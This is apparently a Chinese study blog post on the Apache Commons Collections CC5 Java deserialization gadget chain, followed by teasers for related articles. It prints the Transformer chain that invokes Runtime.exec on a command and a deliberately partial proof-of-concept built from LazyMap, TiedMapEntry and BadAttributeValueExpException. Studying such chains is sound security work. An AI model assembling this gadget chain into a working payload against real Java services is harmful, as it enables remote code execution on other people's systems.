Java反序列化CC5链子学习

最新推荐文章于 2024-04-22 21:27:12 发布
最新推荐文章于 2024-04-22 21:27:12 发布
阅读量307 收藏
点赞数
文章标签: java 开发语言 后端
原文链接:https://mp.weixin.qq.com/s/ZDSGAe-DR67puM4AUH1QzQ
版权

前言:

Apache Commons Collections是一个扩展了Java标准库里的Collection结构的第三方基础库,它提供了很多强有力的数据结构类型并且实现了各种集合工具类。

前几天分析学习了一下CC1链子,今天在pte课余的时候学习了一下CC5链子,发现前半部分基本上和CC1基本链子都基本一致

这里先放一下前面的一段链子:

Transformer[] transformers = new Transformer[]{

                new ConstantTransformer(Runtime.class),

                new InvokerTransformer("getMethod",new Class[]{

                             String.class,Class[].class},new Object[]{"getRuntime",new Class[0]}),

                new InvokerTransformer("invoke",new Class[]{

                            Object.class,Object[].class,new Object[]{null,new Object[0]}),

               new InvokerTransformer("exec",new Class[]{String.class},new Object[]{cmd})

                };

  Transformer transformedChain = new ChainedTransformer(transformers);

前半段的实现逻辑就是主要靠ChainedTransformer的transformer方法完成链子的实现:

public Object transform(Object object) {     

 for (int i = 0; i < iTransformers.length; i++) {          object = iTransformers[i].transform(object);      

}      

return object;  

}

下半段的实现逻辑,靠调动TiedMapEntry的getValue(),getValue()又调用了get()方法:

public Object getValue() 

{        

return map.get(key);    

}

而这里的get方法会去调用this,factory的transform方法,靠这里跟上半段完成了衔接,调用了ChainedTransformer,而getValue()方法会由TiedMapEntry的toString方法调用,接下来就是寻找readObject方法了,这里使用的是BadAttributeValueExpException的readObject方法。

private void readObject(ObjectInputStream ois) throws IOException, ClassNotFoundException {

        ObjectInputStream.GetField gf = ois.readFields();

        Object valObj = gf.get("val", null);



        if (valObj == null) {

            val = null;

        } else if (valObj instanceof String) {

            val= valObj;

        } else if (System.getSecurityManager() == null

                || valObj instanceof Long

                || valObj instanceof Integer

                || valObj instanceof Float

                || valObj instanceof Double

                || valObj instanceof Byte

                || valObj instanceof Short

                || valObj instanceof Boolean) {

            val = valObj.toString();

        } else { // the serialized object is from a version without JDK-8019292 fix

            val = System.identityHashCode(valObj) + "@" + valObj.getClass().getName();

        }

    }

接下来放下半段的poc了,分开放的目的是因为这篇文章主要是为了学习,所以不提供现成的poc了。

Map innerMap = new HashMap();

Map outerMap = LazyMap.decorate(innerMap, transformedChain);

TiedMapEntry tiedMapEntry = new TiedMapEntry(outerMap,"chd");



BadAttributeValueExpException badAttributeValueExpException = new BadAttributeValueExpException(null);



Field val = Class.forName("javax.management.BadAttributeValueExpException").getDeclaredField("val");

val.setAccessible(true);

val.set(poc,badAttributeValueExpException);

希望各位师傅多多指点

清洁工_image
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
Java安全学习笔记--序列漏洞利用链CC5链
m0_64685672的博客
01-22 1211
测试环境 jdk1.8(jdk8u71) Commons Collections4.0 在jdk1.8的时候Annotationinvocation的readObject方法被改写,cc1链就不适用了,cc5链是基于Lazymap类在jdk1.8使用TiedMapEntry+BadAttributeValueExpException来触发LazyMap的get方法。CC1LazyMap链 利用链核心 Transformer[] transformers=new Transforme.
Java安全--CC5
qq_64201116的博客
12-21 455
再往后一路都比较熟悉就不说了。
Javaweb安全——序列漏洞-CC&CB链思路整理
weixin_43610673的博客
10-28 2282
如上图所示基本上起点终点就是那几个点然后相互拼接:《Shiro RememberMe 漏洞检测的探索之路》中Koalr师傅已经对CommonsCollections 系列 gadget进行了提纯变成以下四条对命令执行部分的调用分别为InvokerTransformer调用TemplatesImpl对 commons-Collections4 的适配则直接用替换。
java序列CC5超详细易懂分析
最新发布
2301_79724395的博客
04-22 206
在你学习这篇文章之前,cc1和cc6已经已经是会的,这样才能更好的来理解这篇文章。
[Java序列]—CommonsCollections5
snowlyzz的博客
11-29 330
CC5分析
java--CommonsCollections5学习
zyer
05-30 232
cc5和cc6差不多,主要都是利用TideMapEntry从而利用LazyMap调用get方法,而LazyMap的get方法需要的参数是LazyMap中没有的值才会触发LazyMap的transform的put方法。 TiedMapEntry 主要使用的是LazyMap的get方法,那么在这里我们可以看到其中getValue,hashCode,equals,toString都可以触发 那么下面我们需要寻找一个可以输入TideMapEntry这个类,并且可以触发这些函数之一的一个类。 BadAtt
java序列工具
11-21
java序列工具,覆盖jboss、weblogic、websphere。
Java序列实战.pdf
08-08
本议题将从那些经典案例入手,分析攻击方和防御方的对抗过程。会从fastjson与weblogic的两个经典漏洞,带大家傲游序列的世界。 序列入门 Fastjson Weblogic 序列防御
Java序列回显解决方案.docx
12-19
Java序列回显解决方案 Java序列回显解决方案是指在Java中,使用序列来执行命令,导致RCE(Remote Code Execution)的解决方案。该解决方案主要涉及到Java序列机制和ClassLoader的使用。 首先,...
Java 序列学习的实验代码.rar
01-16
Java序列漏洞学习实践中的代码 Java序列漏洞学习实践一:从Serializbale接口开始,先弹个计算器 Java序列漏洞学习实践二:Java射机制(Java Reflection) Java序列漏洞学习实践三:理解java...
深入分析Java序列序列
12-22
本文通过分析ArrayList的序列来介绍Java序列的相关内容。主要涉及到以下几个问题:  怎么实现Java序列  为什么实现了java.io.Serializable接口才能被序列  transient的作用是什么  怎么自定义序列...
Java安全学习笔记--基于ysoserial序列利用工具CC2和CC5链构造方式的思考
m0_64685672的博客
02-02 2504
前言:ysoserial序列利用工具的CC5链和CC6链的利用链核心都还是LazyMap+ChainedTransformer,两条利用链通过TideMapEntry的toString和hashCode方法来触发核心利用链,最终触发get方法 把三个方法放一块 public V getValue() { return this.map.get(this.key);//这里的this.map就是我们的LazyMap } //LazyMap的get方法: public V get(Object
Java安全』序列-CC5序列漏洞POP链分析_ysoserial CommonsCollections5 PoC分析
Ho1aAs‘s Blog
03-12 991
文章目录前言代码复现工具类PoC代码审计 | 原理分析1. LazyMap.get()调用this.factory.transform()2. TiedMapEntry.toString()调用this.map.get()3. BadAttributeValueExpException序列触发this.val.toString()POP链完 前言 由于jdk8修复了AnnotationInvokerHandler,cc1用不了了 cc5在cc1点基础上做了小的改进,还是使用Commons-Collect
告别脚本小子系列丨JAVA安全(7)——序列利用链(中)
C20220511的博客
04-27 541
0x01 前言距离上一次更新JAVA安全的系列文章已经过去一段时间了,在上一篇文章中介绍了序列利用链基本知识,并阐述了Transform链的基本知识。Transform链并不是一条完整的利用链,只是CommonsCollections利用链中的一部分。当然并不是所有的CC链都需要用Transform链。为了更方便的理解CC链,我们并不会按照顺序来阐述所有的链,而是按照链的难易程度,由易到难。往期推荐1告别脚本小子系列丨JAVA安全(1)——JAVA本地调试和远程调试技巧2告别脚本小子系列丨JAVA安全(
Java安全学习笔记--序列漏洞利用链CC6链
m0_64685672的博客
01-24 1032
测试环境: jdk1.8(jdk8u71) Commons Collections4.0 HashSet HashSet使用的是Hash表的数据结构,增删改查的时间复杂度为O(1),Set是一种集合,元素没有添加顺序,集合中不会有重复元素,结合一下就大概知道HashSet的大概属性了,具体是否重复的算法是根据元素所属对象的equals()方法来判断是否重复,默认是Object这个父类的方法,会比较引用是否相同,这个方法是可以重写的,比如String类就重写了这个方法,会比较内容是否相同 .
yso-cc5
springgold的博客
10-20 140
yso-cc5 1.从入口看 关键类BadAttributeValueExpException。 BadAttributeValueExpException类的readobject,调用 val = valObj.toString() val已被赋值为TiedMapEntry类,toString方法如下: public String toString() { return this.getKey() + "=" + this.getValue(); } //调用getVa
[JAVA序列初学3]Commons-Collections5利用链分析
GX233的博客
03-24 5136
[JAVA序列]Commons-Collections5利用链分析
Java安全研究——序列漏洞之CC
weixin_43889136的博客
04-13 3967
0x01前言 apachecommons-collections组件下的序列漏洞,自从该组件被爆出漏洞后,许多安全研究员相继挖掘到java多种组件的漏洞,危害严重。本人也是初学Java审计不久,技术薄弱,所以在此做一个cc链的学习总结,如有错误还请大佬指出。 若本文有侵权行为,请立即私信,将全面修正。 0x02漏洞环境 JDK1.8 Apache Commons Collections 3.2版本 0x03序列漏洞 序列是将对象的状态信息转换为可以存储或传输的形式的过程,通俗的说,.
Java序列CC1链 详解
Jay17的博客
10-06 942
Java序列CC1链 详解
java序列攻击
10-05
Java序列攻击是一种安全漏洞,攻击者可以通过操纵序列过程中的输入数据,来执行未授权的操作。攻击者可以通过修改被序列的对象的内容,或者创建恶意的序列数据,来导致代码执行、远程命令执行、上传恶意...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值